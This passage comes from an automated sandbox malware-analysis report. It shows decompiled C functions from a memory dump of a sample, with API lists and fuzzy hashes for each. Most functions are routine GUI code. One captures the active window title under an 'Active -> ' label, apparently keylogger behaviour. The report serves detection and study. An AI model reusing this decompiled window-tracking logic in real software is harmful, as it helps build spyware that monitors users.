                                                    							return _t147;
                                                    						} else {
                                                    							goto L40;
                                                    						}
                                                    						do {
                                                    							L40:
                                                    							_t208 = _t208 - 1;
                                                    							_t147 =  *((intOrPtr*)(_t260 + _t208 * 8 - 0x250));
                                                    							_push(_t147);
                                                    							L00417E14();
                                                    						} while (_t208 != 0);
                                                    						goto L41;
                                                    					} else {
                                                    						do {
                                                    							_t207 = _t207 - 1;
                                                    							_t148 = _t260 + _t207 * 8 - 0x250;
                                                    							_t227 =  *((intOrPtr*)(_t260 + _t207 * 8 - 0x250 + 4));
                                                    							_t272 = _t227;
                                                    							if(_t227 != 0) {
                                                    								E00405950( *_t148,  *_t148, _t227, _t272);
                                                    							}
                                                    						} while (_t207 != 0);
                                                    						goto L39;
                                                    					}
                                                    				} else {
                                                    					_v24 = _a8;
                                                    					_v28 = _t260 + (_t256 + _t256) * 8 - 0x650;
                                                    					_t209 = 0;
                                                    					do {
                                                    						_v28 = _v28 - 0x10;
                                                    						_t157 =  *((intOrPtr*)(_t258 + _t209 + 3));
                                                    						_v16 = _t157 & 0x7f;
                                                    						_t158 = _t157 & 0x00000080;
                                                    						if(_v16 != 0xa) {
                                                    							__eflags = _v16 - 0x48;
                                                    							if(_v16 != 0x48) {
                                                    								__eflags = _t158;
                                                    								if(_t158 == 0) {
                                                    									__eflags = _v16 - 0xc;
                                                    									if(_v16 != 0xc) {
                                                    										 *_v28 = _v16;
                                                    										_v28[2] =  *_v24;
                                                    										__eflags = _v16 - 5;
                                                    										if(_v16 >= 5) {
                                                    											__eflags = _v16 - 7;
                                                    											if(_v16 <= 7) {
                                                    												_t93 =  &_v24;
                                                    												 *_t93 =  &(_v24[1]);
                                                    												__eflags =  *_t93;
                                                    												_v28[3] =  *_v24;
                                                    											}
                                                    										}
                                                    									} else {
                                                    										__eflags =  *_v24 - 0x100;
                                                    										if( *_v24 != 0x100) {
                                                    											_t165 = _v24;
                                                    											 *_v28 =  *_t165;
                                                    											_v28[1] = _t165[1];
                                                    											_t211 = _v28;
                                                    											_v28[2] = _t165[2];
                                                    											_v28[3] = _t165[3];
                                                    											_v24 =  &(_v24[3]);
                                                    										} else {
                                                    											_v36 = _t260 + _v20 * 8 - 0x250;
                                                    											 *_v36 = E00405974(_v24[2], _t211);
                                                    											_v36[1] = 0;
                                                    											 *_v28 = 8;
                                                    											_v28[2] =  *_v36;
                                                    											_v20 = _v20 + 1;
                                                    										}
                                                    									}
                                                    									goto L23;
                                                    								}
                                                    								__eflags = _v16 - 0xc;
                                                    								if(_v16 == 0xc) {
                                                    									__eflags =  *( *_v24) - 0x100;
                                                    									if( *( *_v24) == 0x100) {
                                                    										_t211 = 8;
                                                    										E00411330( *_v24, 8,  *_v24, _t256, _t276);
                                                    									}
                                                    								}
                                                    								 *_v28 = _v16 | 0x00004000;
                                                    								_v28[2] =  *_v24;
                                                    								goto L23;
                                                    							} else {
                                                    								_v32 = _t260 + _v20 * 8 - 0x250;
                                                    								__eflags = _t158;
                                                    								if(_t158 == 0) {
                                                    									 *_v32 = E00405974( *_v24, _t211);
                                                    									__eflags = 0;
                                                    									 *(_v32 + 4) = 0;
                                                    									 *_v28 = 8;
                                                    									_v28[2] =  *_v32;
                                                    								} else {
                                                    									 *_v32 = E00405974( *( *_v24), _t211);
                                                    									 *(_v32 + 4) =  *_v24;
                                                    									 *_v28 = 0x4008;
                                                    									_v28[2] = _v32;
                                                    								}
                                                    								_v20 = _v20 + 1;
                                                    								L23:
                                                    								_t98 =  &_v24;
                                                    								 *_t98 =  &(_v24[1]);
                                                    								__eflags =  *_t98;
                                                    								goto L24;
                                                    							}
                                                    						} else {
                                                    							 *_v28 = 0xa;
                                                    							_v28[2] = 0x80020004;
                                                    						}
                                                    						L24:
                                                    						_t209 = _t209 + 1;
                                                    					} while (_t256 != _t209);
                                                    					goto L25;
                                                    				}
                                                    			}

                                                    APIs
                                                    • SysFreeString.OLEAUT32(?), ref: 00478782
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeString
                                                    • String ID: <~G$H
                                                    • API String ID: 3341692771-3576284788
                                                    • Opcode ID: ecd8712ba81d153100f6d8ed10ab1aa9da3ca18861188e6ea00d8c1b46d0990f
                                                    • Instruction ID: b8f1c08bed6d2714fac9d526e07dd471d665f945914cf58d975e5e29605529f8
                                                    • Opcode Fuzzy Hash: ecd8712ba81d153100f6d8ed10ab1aa9da3ca18861188e6ea00d8c1b46d0990f
                                                    • Instruction Fuzzy Hash: E7B1F8B4A006099FDB14CF99C884AAEB7F1FF49314F20C56AE909AB351D738AD41CF64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 79%
                                                    			E00424E24(void* __eax, void* __ebx, void* __ecx) {
                                                    				signed int _v8;
                                                    				struct tagLOGFONTA _v68;
                                                    				char _v72;
                                                    				char _v76;
                                                    				char _v80;
                                                    				intOrPtr _t76;
                                                    				intOrPtr _t81;
                                                    				void* _t107;
                                                    				void* _t116;
                                                    				intOrPtr _t126;
                                                    				void* _t137;
                                                    				void* _t138;
                                                    				intOrPtr _t139;
                                                    
                                                    				_t137 = _t138;
                                                    				_t139 = _t138 + 0xffffffb4;
                                                    				_v80 = 0;
                                                    				_v76 = 0;
                                                    				_v72 = 0;
                                                    				_t116 = __eax;
                                                    				_push(_t137);
                                                    				_push(0x424fad);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t139;
                                                    				_v8 =  *((intOrPtr*)(__eax + 0x10));
                                                    				if( *((intOrPtr*)(_v8 + 8)) != 0) {
                                                    					 *[fs:eax] = 0;
                                                    					_push(0x424fb4);
                                                    					return E004049E4( &_v80, 3);
                                                    				} else {
                                                    					_t76 =  *0x49e8e0; // 0x22f0a30
                                                    					E00424168(_t76);
                                                    					_push(_t137);
                                                    					_push(0x424f85);
                                                    					_push( *[fs:eax]);
                                                    					 *[fs:eax] = _t139;
                                                    					if( *((intOrPtr*)(_v8 + 8)) == 0) {
                                                    						_v68.lfHeight =  *(_v8 + 0x14);
                                                    						_v68.lfWidth = 0;
                                                    						_v68.lfEscapement = 0;
                                                    						_v68.lfOrientation = 0;
                                                    						if(( *(_v8 + 0x19) & 0x00000001) == 0) {
                                                    							_v68.lfWeight = 0x190;
                                                    						} else {
                                                    							_v68.lfWeight = 0x2bc;
                                                    						}
                                                    						_v68.lfItalic = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000002) != 0x00000000;
                                                    						_v68.lfUnderline = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000004) != 0x00000000;
                                                    						_v68.lfStrikeOut = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000008) != 0x00000000;
                                                    						_v68.lfCharSet =  *((intOrPtr*)(_v8 + 0x1a));
                                                    						E00404C24( &_v72, _v8 + 0x1b);
                                                    						if(E00408F88(_v72, "Default") != 0) {
                                                    							E00404C24( &_v80, _v8 + 0x1b);
                                                    							E0040A020( &(_v68.lfFaceName), _v80);
                                                    						} else {
                                                    							E00404C24( &_v76, "\rMS Sans Serif");
                                                    							E0040A020( &(_v68.lfFaceName), _v76);
                                                    						}
                                                    						_v68.lfQuality = 0;
                                                    						_v68.lfOutPrecision = 0;
                                                    						_v68.lfClipPrecision = 0;
                                                    						_t107 = E00425108(_t116) - 1;
                                                    						if(_t107 == 0) {
                                                    							_v68.lfPitchAndFamily = 2;
                                                    						} else {
                                                    							if(_t107 == 1) {
                                                    								_v68.lfPitchAndFamily = 1;
                                                    							} else {
                                                    								_v68.lfPitchAndFamily = 0;
                                                    							}
                                                    						}
                                                    						 *((intOrPtr*)(_v8 + 8)) = CreateFontIndirectA( &_v68);
                                                    					}
                                                    					_pop(_t126);
                                                    					 *[fs:eax] = _t126;
                                                    					_push(0x424f8c);
                                                    					_t81 =  *0x49e8e0; // 0x22f0a30
                                                    					return E00424174(_t81);
                                                    				}
                                                    			}

                                                    APIs
                                                      • Part of subcall function 00424168: RtlEnterCriticalSection.KERNEL32(?,004241A5), ref: 0042416C
                                                    • CreateFontIndirectA.GDI32(?), ref: 00424F62
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateCriticalEnterFontIndirectSection
                                                    • String ID: MS Sans Serif$Default
                                                    • API String ID: 2931345757-2137701257
                                                    • Opcode ID: 89d54db4af104641d8e73ec6089c9fc87516c81d3827a31575630f39306a7239
                                                    • Instruction ID: b3d76d3ca7c544b37bc71fdcf573607e07253616adc25b4daf7a036753d91774
                                                    • Opcode Fuzzy Hash: 89d54db4af104641d8e73ec6089c9fc87516c81d3827a31575630f39306a7239
                                                    • Instruction Fuzzy Hash: 16517F31B04258DFDB01DFA4D641B8DBBF6EF88304FA640AAE804A7352D3389E05DB59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 72%
                                                    			E0044E02C(intOrPtr __eax, void* __edx) {
                                                    				char _v8;
                                                    				signed short _v10;
                                                    				intOrPtr _v16;
                                                    				char _v17;
                                                    				char _v24;
                                                    				intOrPtr _t34;
                                                    				intOrPtr _t40;
                                                    				intOrPtr _t42;
                                                    				intOrPtr _t48;
                                                    				void* _t51;
                                                    				intOrPtr _t64;
                                                    				intOrPtr _t67;
                                                    				void* _t69;
                                                    				void* _t71;
                                                    				intOrPtr _t72;
                                                    
                                                    				_t69 = _t71;
                                                    				_t72 = _t71 + 0xffffffec;
                                                    				_t51 = __edx;
                                                    				_v16 = __eax;
                                                    				_v10 =  *((intOrPtr*)(__edx + 4));
                                                    				if(_v10 == 0) {
                                                    					return 0;
                                                    				} else {
                                                    					if(GetKeyState(0x10) < 0) {
                                                    						_v10 = _v10 + 0x2000;
                                                    					}
                                                    					if(GetKeyState(0x11) < 0) {
                                                    						_v10 = _v10 + 0x4000;
                                                    					}
                                                    					if(( *(_t51 + 0xb) & 0x00000020) != 0) {
                                                    						_v10 = _v10 + 0x8000;
                                                    					}
                                                    					_v24 =  *((intOrPtr*)(_v16 + 0x34));
                                                    					_t34 =  *0x49ebac; // 0x22f0da8
                                                    					E0042C30C(_t34,  &_v24);
                                                    					_push(_t69);
                                                    					_push(0x44e12a);
                                                    					_push( *[fs:eax]);
                                                    					 *[fs:eax] = _t72;
                                                    					while(1) {
                                                    						_v17 = 0;
                                                    						_v8 = E0044DD30(_v16, 2, _v10 & 0x0000ffff);
                                                    						if(_v8 != 0) {
                                                    							break;
                                                    						}
                                                    						if(_v24 == 0 || _v17 != 2) {
                                                    							_pop(_t64);
                                                    							 *[fs:eax] = _t64;
                                                    							_push(0x44e131);
                                                    							_t40 =  *0x49ebac; // 0x22f0da8
                                                    							return E0042C304(_t40);
                                                    						} else {
                                                    							continue;
                                                    						}
                                                    						goto L14;
                                                    					}
                                                    					_t42 =  *0x49ebac; // 0x22f0da8
                                                    					E0042C30C(_t42,  &_v8);
                                                    					_push(_t69);
                                                    					_push(0x44e0ff);
                                                    					_push( *[fs:eax]);
                                                    					 *[fs:eax] = _t72;
                                                    					_v17 = E0044DED8( &_v8, 0, _t69);
                                                    					_pop(_t67);
                                                    					 *[fs:eax] = _t67;
                                                    					_push(0x44e106);
                                                    					_t48 =  *0x49ebac; // 0x22f0da8
                                                    					return E0042C304(_t48);
                                                    				}
                                                    				L14:
                                                    			}

                                                    APIs
                                                    • GetKeyState.USER32(00000010), ref: 0044E050
                                                    • GetKeyState.USER32(00000011), ref: 0044E062
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: State
                                                    • String ID:
                                                    • API String ID: 1649606143-3916222277
                                                    • Opcode ID: 44b487c12f32330f0e2b631a448e4c074bb6be9e776f131d9141241d4ae5a6fd
                                                    • Instruction ID: dd991a499b8bdb83682dc26b7e7e078d12a516ef0c40e0bf5f2210f7bad781b1
                                                    • Opcode Fuzzy Hash: 44b487c12f32330f0e2b631a448e4c074bb6be9e776f131d9141241d4ae5a6fd
                                                    • Instruction Fuzzy Hash: D231F731A04218AFEB11DFA6E84179EB7F5FB48314F50C4BBEC00A6291E77C5A00D668
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 67%
                                                    			E0045AE50(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                    				intOrPtr _v8;
                                                    				char _v9;
                                                    				char _v16;
                                                    				char _v20;
                                                    				intOrPtr _t36;
                                                    				long _t41;
                                                    				intOrPtr _t52;
                                                    				intOrPtr _t66;
                                                    				intOrPtr* _t67;
                                                    				intOrPtr _t68;
                                                    				void* _t74;
                                                    				void* _t75;
                                                    				intOrPtr _t76;
                                                    
                                                    				_t72 = __esi;
                                                    				_t71 = __edi;
                                                    				_t74 = _t75;
                                                    				_t76 = _t75 + 0xfffffff0;
                                                    				_push(__ebx);
                                                    				_push(__esi);
                                                    				_push(__edi);
                                                    				_v16 = 0;
                                                    				_v20 = 0;
                                                    				_v8 = __eax;
                                                    				_push(_t74);
                                                    				_push(0x45af60);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t76;
                                                    				_t56 = E0045ADD8(_v8);
                                                    				if( *((char*)(_v8 + 0x88)) != 0) {
                                                    					_t52 = _v8;
                                                    					_t79 =  *((intOrPtr*)(_t52 + 0x48));
                                                    					if( *((intOrPtr*)(_t52 + 0x48)) == 0) {
                                                    						E0045B3A8(_v8);
                                                    					}
                                                    				}
                                                    				E00458DF8(_t56,  &_v20);
                                                    				E004380E0(_v20, 0,  &_v16, _t79);
                                                    				_t36 =  *0x49ebb8; // 0x0
                                                    				E0045B010(_t36, _v16, _t79);
                                                    				_v9 = 1;
                                                    				_push(_t74);
                                                    				_push(0x45af07);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t76;
                                                    				if( *((short*)(_v8 + 0x102)) != 0) {
                                                    					_t56 = _v8;
                                                    					 *((intOrPtr*)(_v8 + 0x100))();
                                                    				}
                                                    				if(_v9 != 0) {
                                                    					E0045AD74();
                                                    				}
                                                    				_pop(_t66);
                                                    				 *[fs:eax] = _t66;
                                                    				_t41 = GetCurrentThreadId();
                                                    				_t67 =  *0x49de40; // 0x49e034
                                                    				if(_t41 ==  *_t67 && E004214B8(0, _t56, _t71, _t72) != 0) {
                                                    					_v9 = 0;
                                                    				}
                                                    				if(_v9 != 0) {
                                                    					WaitMessage();
                                                    				}
                                                    				_pop(_t68);
                                                    				 *[fs:eax] = _t68;
                                                    				_push(E0045AF67);
                                                    				return E004049E4( &_v20, 2);
                                                    			}

                                                    APIs
                                                      • Part of subcall function 0045ADD8: GetCursorPos.USER32 ref: 0045ADE1
                                                    • GetCurrentThreadId.KERNEL32 ref: 0045AF1C
                                                    • WaitMessage.USER32(00000000,0045AF60,?,?,?,0049ABD1), ref: 0045AF40
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CurrentCursorMessageThreadWait
                                                    • String ID: 4I
                                                    • API String ID: 535285469-2364942553
                                                    • Opcode ID: 1641b2bc43e08f655398654ef54c6e0fb99346d68cca38ad066637ff64216bef
                                                    • Instruction ID: 3d320c2a842818ba80bdb21166925b08477e9e3b0af4457c4c140f173818ef6e
                                                    • Opcode Fuzzy Hash: 1641b2bc43e08f655398654ef54c6e0fb99346d68cca38ad066637ff64216bef
                                                    • Instruction Fuzzy Hash: F431D670A04208EFDB01DF65C846BAEB7F5EB05305F6145BAEC00A7392D7796E58C71A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 59%
                                                    			E0042A3E8(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, char _a8, void* _a12) {
                                                    				intOrPtr _v8;
                                                    				intOrPtr _v12;
                                                    				intOrPtr _t62;
                                                    				intOrPtr _t64;
                                                    				intOrPtr _t67;
                                                    				void* _t77;
                                                    				void* _t78;
                                                    				intOrPtr _t79;
                                                    				intOrPtr _t80;
                                                    
                                                    				_t77 = _t78;
                                                    				_t79 = _t78 + 0xfffffff8;
                                                    				_v8 = __eax;
                                                    				_v12 = E00403BBC(1);
                                                    				_push(_t77);
                                                    				_push(0x42a46f);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t79;
                                                    				 *((intOrPtr*)(_v12 + 8)) = __edx;
                                                    				 *((intOrPtr*)(_v12 + 0x10)) = __ecx;
                                                    				memcpy(_v12 + 0x18, _a12, 0x15 << 2);
                                                    				_t80 = _t79 + 0xc;
                                                    				 *((char*)(_v12 + 0x70)) = _a8;
                                                    				if( *((intOrPtr*)(_v12 + 0x2c)) != 0) {
                                                    					 *((intOrPtr*)(_v12 + 0x14)) =  *((intOrPtr*)(_v12 + 8));
                                                    				}
                                                    				_t62 =  *0x418ef8; // 0x418f44
                                                    				 *((intOrPtr*)(_v12 + 0x6c)) = E00403D9C(_a4, _t62);
                                                    				_pop(_t64);
                                                    				 *[fs:eax] = _t64;
                                                    				_push(0x49e8b0);
                                                    				L00406FE0();
                                                    				_push(_t77);
                                                    				_push(0x42a4cf);
                                                    				_push( *[fs:edx]);
                                                    				 *[fs:edx] = _t80;
                                                    				E00428E70( *((intOrPtr*)(_v8 + 0x28)));
                                                    				 *((intOrPtr*)(_v8 + 0x28)) = _v12;
                                                    				E00428E6C(_v12);
                                                    				_pop(_t67);
                                                    				 *[fs:eax] = _t67;
                                                    				_push(0x42a4d6);
                                                    				_push(0x49e8b0);
                                                    				L004071A0();
                                                    				return 0;
                                                    			}

                                                    APIs
                                                    • RtlEnterCriticalSection.KERNEL32(0049E8B0), ref: 0042A48B
                                                    • RtlLeaveCriticalSection.KERNEL32(0049E8B0,0042A4D6,0049E8B0), ref: 0042A4C9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave
                                                    • String ID: P>B
                                                    • API String ID: 3168844106-1256901731
                                                    • Opcode ID: 529a9a366aa929e4620bea5d697823ec64bf912a646acf53574e1b983412bb67
                                                    • Instruction ID: 63024a2a2f57267be46c6b4524dac06f3360d3f79ec1ca4db72fa5e9cc5c2d4b
                                                    • Opcode Fuzzy Hash: 529a9a366aa929e4620bea5d697823ec64bf912a646acf53574e1b983412bb67
                                                    • Instruction Fuzzy Hash: 77218E74B04314EFD701DF69D88188DBBF5FB48720B5281AAE844A7791D778EE90CA98
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 51%
                                                    			E004769AC(void* __ebx, void* __edx) {
                                                    				char _v8;
                                                    				char _v12;
                                                    				char _v16;
                                                    				char _v20;
                                                    				char _v24;
                                                    				int _t28;
                                                    				intOrPtr _t32;
                                                    				void* _t37;
                                                    				intOrPtr* _t45;
                                                    				struct HWND__* _t48;
                                                    				intOrPtr _t55;
                                                    				intOrPtr _t67;
                                                    
                                                    				_push(0);
                                                    				_push(0);
                                                    				_push(0);
                                                    				_push(0);
                                                    				_push(0);
                                                    				_push(_t67);
                                                    				_push(0x476a7b);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t67;
                                                    				_t48 =  *(__edx + 4);
                                                    				if(_t48 > 0) {
                                                    					E0040500C( &_v8, GetWindowTextLengthA(_t48));
                                                    					_t28 = E00404C80(_v8) + 1;
                                                    					GetWindowTextA(_t48, E00404E80(_v8), _t28);
                                                    					_t32 =  *0x49ec6c; // 0x0
                                                    					E00408FF8(_t32,  &_v12);
                                                    					_push(_v12);
                                                    					E00408FF8(_v8,  &_v16);
                                                    					_pop(_t37);
                                                    					E00404DCC(_t37, _v16);
                                                    					if(_t28 != 0) {
                                                    						E00408FF8(_v8,  &_v20);
                                                    						if(_v20 != 0) {
                                                    							E00404A14(0x49ec6c, _v8);
                                                    							E00404CCC( &_v24, _v8, "Active -> ");
                                                    							_t45 =  *0x49ec44; // 0x0
                                                    							 *0x49ec48 =  *((intOrPtr*)( *_t45 + 0x38))();
                                                    						}
                                                    					}
                                                    				}
                                                    				_pop(_t55);
                                                    				 *[fs:eax] = _t55;
                                                    				_push(0x476a82);
                                                    				return E004049E4( &_v24, 5);
                                                    			}

                                                    APIs
                                                    • GetWindowTextLengthA.USER32(?), ref: 004769D1
                                                    • GetWindowTextA.USER32 ref: 004769F4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: TextWindow$Length
                                                    • String ID: Active ->
                                                    • API String ID: 1006428111-2811066380
                                                    • Opcode ID: a34852fa71e462f670709aa45cdd9028366e921516bd4f16c1ddaa93e44f0273
                                                    • Instruction ID: d9f40d637c3a14713fae2ad8e053e9984e8428a736acad8caa5444ef25058333
                                                    • Opcode Fuzzy Hash: a34852fa71e462f670709aa45cdd9028366e921516bd4f16c1ddaa93e44f0273
                                                    • Instruction Fuzzy Hash: 7C215774600209DFD704EBA5C9829AFB3B9EF45704B61857BF505B3351DB78AE00CA68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 64%
                                                    			E0043B290(void* __eax, void* __ebx, void* __edi, void* __esi) {
                                                    				char _v8;
                                                    				char _v12;
                                                    				char _v16;
                                                    				intOrPtr _t31;
                                                    				void* _t36;
                                                    				intOrPtr _t42;
                                                    				struct HDC__* _t47;
                                                    				void* _t50;
                                                    
                                                    				_push(__esi);
                                                    				_v16 = 0;
                                                    				_t36 = __eax;
                                                    				_push(_t50);
                                                    				_push(0x43b326);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t50 + 0xfffffff4;
                                                    				if( *((intOrPtr*)(__eax + 0x30)) == 0) {
                                                    					_v12 =  *((intOrPtr*)(__eax + 8));
                                                    					_v8 = 0xb;
                                                    					_t31 =  *0x49dc4c; // 0x422f30
                                                    					E00406A70(_t31,  &_v16);
                                                    					E0040D180(_t36, _v16, 1, __edi, __esi, 0,  &_v12);
                                                    					E00404378();
                                                    				}
                                                    				_t47 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x30)))) + 0x48))();
                                                    				SetViewportOrgEx(_t47,  *(_t36 + 0x40),  *(_t36 + 0x44), 0);
                                                    				IntersectClipRect(_t47, 0, 0,  *(_t36 + 0x48),  *(_t36 + 0x4c));
                                                    				_pop(_t42);
                                                    				 *[fs:eax] = _t42;
                                                    				_push(0x43b32d);
                                                    				return E004049C0( &_v16);
                                                    			}

                                                    APIs
                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0043B2F9
                                                    • IntersectClipRect.GDI32(00000000,00000000,00000000,?,?), ref: 0043B30B
                                                      • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ClipIntersectLoadRectStringViewport
                                                    • String ID: 0/B
                                                    • API String ID: 2734429277-1373906003
                                                    • Opcode ID: e2a8b772cc04bb5050f4f3461b5c500d9201bab241943ca1f0f2e8e1c857e399
                                                    • Instruction ID: e8a904d80b5f428ce4efa45f7181a255eb87ff5514a318c6dca8c784068d0644
                                                    • Opcode Fuzzy Hash: e2a8b772cc04bb5050f4f3461b5c500d9201bab241943ca1f0f2e8e1c857e399
                                                    • Instruction Fuzzy Hash: 25112E71A04204AFDB04DF99DC91FAE77A8EB49304F5040BAFE00EB291DB75AD00CB99
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E0043B338(void* __eflags, intOrPtr _a4) {
                                                    				char _v5;
                                                    				struct tagRECT _v21;
                                                    				struct tagRECT _v40;
                                                    				void* _t40;
                                                    				void* _t45;
                                                    
                                                    				_v5 = 1;
                                                    				_t44 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198));
                                                    				_t45 = E0041ACC8( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198)),  *((intOrPtr*)(_a4 - 4)));
                                                    				if(_t45 <= 0) {
                                                    					L5:
                                                    					_v5 = 0;
                                                    				} else {
                                                    					do {
                                                    						_t45 = _t45 - 1;
                                                    						_t40 = E0041AC6C(_t44, _t45);
                                                    						if( *((char*)(_t40 + 0x57)) == 0 || ( *(_t40 + 0x50) & 0x00000040) == 0) {
                                                    							goto L4;
                                                    						} else {
                                                    							E0043A91C(_t40,  &_v40);
                                                    							IntersectRect( &_v21, _a4 + 0xffffffec,  &_v40);
                                                    							if(EqualRect( &_v21, _a4 + 0xffffffec) == 0) {
                                                    								goto L4;
                                                    							}
                                                    						}
                                                    						goto L6;
                                                    						L4:
                                                    					} while (_t45 > 0);
                                                    					goto L5;
                                                    				}
                                                    				L6:
                                                    				return _v5;
                                                    			}

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Rect$EqualIntersect
                                                    • String ID: @
                                                    • API String ID: 3291753422-2766056989
                                                    • Opcode ID: 3dbe96d5647e64b59e77b546ad2791974d62cec345338b82838d99b1a4952e45
                                                    • Instruction ID: ff87b59c4918c05e59a4b882000aa20bb8e2e27f5e52085d9b15fe210c2257fb
                                                    • Opcode Fuzzy Hash: 3dbe96d5647e64b59e77b546ad2791974d62cec345338b82838d99b1a4952e45
